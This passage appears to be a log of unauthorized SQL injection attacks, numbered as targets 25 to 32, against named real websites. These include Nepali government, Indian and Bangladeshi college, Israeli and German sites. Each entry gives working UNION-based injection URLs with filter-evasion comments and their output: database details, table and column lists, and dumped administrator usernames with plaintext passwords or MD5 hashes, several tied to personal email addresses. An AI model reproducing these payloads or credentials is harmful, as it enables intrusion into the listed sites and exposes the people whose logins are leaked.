  588. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,column_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000columns+*/where /*!50000table_name*/ ='usertable' limit 2,5 --+
  589. --> userp
  590.  
  591. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,userp*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from*/ usertable--+
  592. -->user : [m@[%}*Fk(ti
  593. --> pass: admin@123
  594.  
  595.  
  596.  
  597. TArget 25:
  598. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 --+
  599. --> 2,4,5,6,7,8,9
  600.  
  601. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(database(),0x3c62723e ,user(),0x3c62723e,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 --+
  602. -->
  603. DB383432
  604. U383432@klute.store.d0m.de
  605. 5.6.36-log
  606.  
  607.  
  608. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(table_name,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.tables where table_schema = database()--+
  609. --> ausstellungen,bilder,collaborations,detail,filme,foerderungen,installationen,movies,movies_ausstellungen,movies_installations,participations,preise,serendipity_access,serendipity_authorgroups,serendipity_authors,serendipity_category,serendipity_comments,serendipity_config,
  610. serendipity_entries,serendipity_entrycat,serendipity_entryproperties,serendipity_exits,serendipity_groupconfig,serendipity_groups,serendipity_images,serendipity_mediaproperties,serendipity_options,serendipity_permalinks,serendipity_plugincategories,serendipity_pluginlist,
  611. serendipity_plugins,serendipity_references,serendipity_referrers,serendipity_refs,serendipity_spamblock_htaccess,serendipity_spamblocklog,serendipity_suppress,serendipity_visitors,serendipity_visitors_count,starters,users,verleihe,vita
  612.  
  613. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.columns where table_name= 'users'--+
  614. --> ID,user,pass
  615.  
  616. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(user,0x3c62723e,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from users--+
  617. --> meggie
  618. 34857ee0ffba0f1a0f63b09ae823f891
  619.  
  620.  
  621. Target 26:
  622. http://www.tacc.co.il/story.php?id=-9 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8--+
  623. -->2,5
  624.  
  625. http://www.tacc.co.il/story.php?id=-9 +/*!50000UNION*/+ALL+SELECT+1,database(),3,4,5,6,7,8--+
  626. --> oferdr_taccnew
  627. user --> oferdr_root@localhost
  628. version --> 5.5.51-38.2
  629. http://www.tacc.co.il/story.php?id=-9++/*!50000UNION*/+ALL+SELECT+1,/*!12345group_ConcAt(table_name,0x3c62723e)*/,3,4,5,6,7,8 /*!50000from+*/information_schema.tables where table_schema = database()--+
  630. -->ads
  631. ,articles
  632. ,categories
  633. ,galleries
  634. ,homepage
  635. ,interviews
  636. ,links
  637. ,logos
  638. ,pictures
  639. ,press
  640. ,products
  641. ,sismaot
  642. ,sub_top_menu
  643. ,team
  644. ,team_categories
  645. ,top_menu
  646. ,videos
  647.  
  648. http://www.tacc.co.il/story.php?id=-9++/*!50000UNION*/+ALL+SELECT+1,/*!12345group_ConcAt(user,0x3c62723e,pass)*/,3,4,5,6,7,8 /*!50000from+*/sismaot --+
  649. -->dfjdf67utr0ds7urt
  650. --> kjkjk87sdsdk878
  651.  
  652.  
  653. Target 27:
  654. http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+user(),2 --+
  655. --> nwuedu_root@localhost
  656. version --> 5.5.51-38.2
  657. http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+database(),2 --+
  658. --> nwuedu_web
  659.  
  660.  
  661. http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+ /*!12345group_ConcAt(table_name,0x3c62723e)*/,2 /*!50000from+*/information_schema.tables where table_schema = database() --+
  662. --> breaking_news
  663. ,contact
  664. ,content
  665. ,download
  666. ,news_events
  667. ,notice_board
  668. ,passed_student
  669.  
  670. target 28:
  671. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10--+
  672. --> 2,8
  673.  
  674. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(database(),user(),version()),3,4,5,6,7,8,9,10--+
  675. --> aayojanpune14
  676. aayojan14@breakside.dreamhost.com
  677. 5.6.34-log
  678.  
  679. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema = database()--+
  680. -->admin_login,assign_panel_menus,assign_panels,manage_user,tbl_addmission,tbl_architecture,tbl_category,tbl_category_work,tbl_contact_us,tbl_content_pages,tbl_course,tbl_events,tbl_homebanner,tbl_largebanner,tbl_links,tbl_news,tbl_notification,tbl_registration,tbl_workdetail,tblcountries
  681.  
  682. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name= 'admin_login'--+
  683. -->adminId,username,password,email
  684.  
  685. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,unhex(hex(group_concat(username,' : ', password,' : ', email))),3,4,5,6,7,8,9,10 from admin_login--+
  686. --> AyojanCMS : AA@13Pune : info@aayojan.edu.in
  687.  
  688. Target 29:
  689. http://www.medep.org.np/index.php?page=page&id=-1 +UNION+ALL+SELECT+1,2,3,4,5,user()--+
  690. -->medeporg_medep@localhost
  691. version()--> 5.5.48-cll
  692. db -->medeporg_medep
  693.  
  694.  
  695.  
  696.  
  697. Target 30:
  698. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--+
  699. --> 5
  700.  
  701. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(version(),0x3c62723e,database(),0x3c62723e,user())*/,6,7,8,9,10,11,12,13--+
  702. --> 5.5.51-38.2
  703. avssv_aeng
  704. avssv_aeng@localhost
  705. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(table_name,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/information_schema.tables where table_Schema = database()--+
  706. --> amt_alumni
  707. ,amt_alumnimeet
  708. ,amt_banner
  709. ,amt_blog
  710. ,amt_dept
  711. ,amt_deptov
  712. ,amt_download
  713. ,amt_email
  714. ,amt_events
  715. ,amt_footerlogo
  716. ,amt_footertext
  717. ,amt_gallery
  718. ,amt_logo
  719. ,amt_menu
  720. ,amt_page
  721. ,amt_plinks
  722. ,amt_quicklinks
  723. ,amt_recimg
  724. ,amt_recruiter
  725. ,amt_slide
  726. ,amt_slider
  727. ,amt_smenu
  728. ,amt_socialicon
  729. ,amt_uploadimg
  730. ,amt_webnm
  731. ,rss_login
  732. ,test
  733.  
  734. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(column_name,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/information_schema.columns where table_name= 'rss_login'--+
  735. --> u_id
  736. ,u_date
  737. ,u_name
  738. ,u_pwd
  739. ,u_role
  740. ,u_block
  741. ,u_purpose
  742. ,u_pages
  743.  
  744.  
  745. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(u_name,' : ',u_pwd,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/ rss_login--+
  746. --> EngAdmin : b512aeaa378b7365c54ee7bb6de633d0
  747. ,sinhaamol@yahoo.com : b2900d0f43934c5a935775b3198feed1
  748. ,sachin.thanekar@yahoo.co.in : sachin@123
  749. ,Shailesh1986 : e0fc28d1eafc198924824175bcc8e114
  750. ,avinashtambe : a1bc6f8c372affb323bf04e37a7310ae
  751. ,aemba : 2471e6c96d191bda48421a0bdd1a3f96
  752. ,gadakh_vijay : 1b3b293dd7a3b09b32f071b6d7c25a1b
  753. ,avcoeelectrical : 7e69238d375fd6d04b002c9a5f0bde67
  754. ,Civildept : d4708487562d467e13d73098fac22623
  755. ,yogeshwar : 2104a6707e7d44b5376f5ad30f1b0ed4
  756. ,sujata.kolekar@gmail.com : 7d801e575202293d82b7f3caf0cf6cc6
  757. ,ashwini.ashu051192@gmail.com : 639bf7cc718bfcebd676eacd962aa077
  758. ,pramod23gunjal@gmail.com : bc3ba1449b7fca1795712c448ec99c97
  759. ,jdhananjayan@gmail.com : 661649a55c18df4e4632917edfdf422c
  760. ,nileshnagarkar@yahoo.com : adee5e67419f86f8a23435960e11689c
  761. ,mrunalfatangare@gmail.com : ce3b43bce6b415f7d3a8fae4af1fb4d7
  762. ,haribhau88@gmail.com : ae6cf7ae724cbe96deb83bb98bc21430
  763. ,kavitapagire : 70deb95e27ef5143b0fd0904c6031200
  764. ,prashant.pawar.in@g
  765.  
  766.  
  767. Target 31;
  768. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+1,2--+
  769. -->1
  770.  
  771. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+group_concat(version(),0x3c62723e,database(),0x3c62723e,user()),2--+
  772. --> 5.6.35
  773. hypreko_prekon
  774. hypreko_prekon@localhost
  775.  
  776.  
  777. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+unhex(hex(table_name)),2 from information_schema.tables where table_schema = database()--+
  778. banners
  779. bottom_content
  780. categorys
  781. contact_content
  782. contact_email
  783. gallery
  784. gallery_categorys
  785. images
  786. latest_projects
  787. news
  788. ongoing_projects
  789. pages
  790. photogallery
  791. php_admin
  792. tbl_ip
  793.  
  794. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+unhex(hex(column_name)),2 from information_schema.columns where table_name= 'php_admin'--+
  795. -->
  796. admin_id
  797. admin_fname
  798. admin_lname
  799. admin_password
  800. admin_email
  801. admin_cdate
  802. admin_status
  803.  
  804. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+admin_password,2 from php_admin--+
  805. --> vizag@123
  806. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+admin_email,2 from php_admin--+
  807. -->admin
  808.  
  809.  
  810.  
  811. Target 32
  812. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
  813. --> 4,8
  814.  
  815. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(version(),0x20,database(),0x20,user()),5,6,7,8,9,10,11,12,13,14,15--+
  816. --> 5.5.52-cll nnlgov_dbase nnlgov_front@localhost
  817.  
  818. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema = database()--+
  819. -->gallery,gallerydetails,rightphoto,tblbanner,tblbhuktani,tblcontacts,tbldownloadgroup,tbldownloads,tblevents,tblfaq,tblfaq_cat,tblgrantgroup,tblgrants,tbljingle,tbllinks,tblmain,tblmenu,tblnews,tblnotice,tblrti,tblrtigroup,tbluploads,tblvideo,usertable,whoiswho
  820.  
  821.  
  822. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name= 'usertable'--+
  823. --> userid,usern,userp
  824.  
  825. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(usern,0x203a,userp,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15 from usertable--+
  826. --> admin@123 :#clv0&sRfR2k
  827. account :account@123#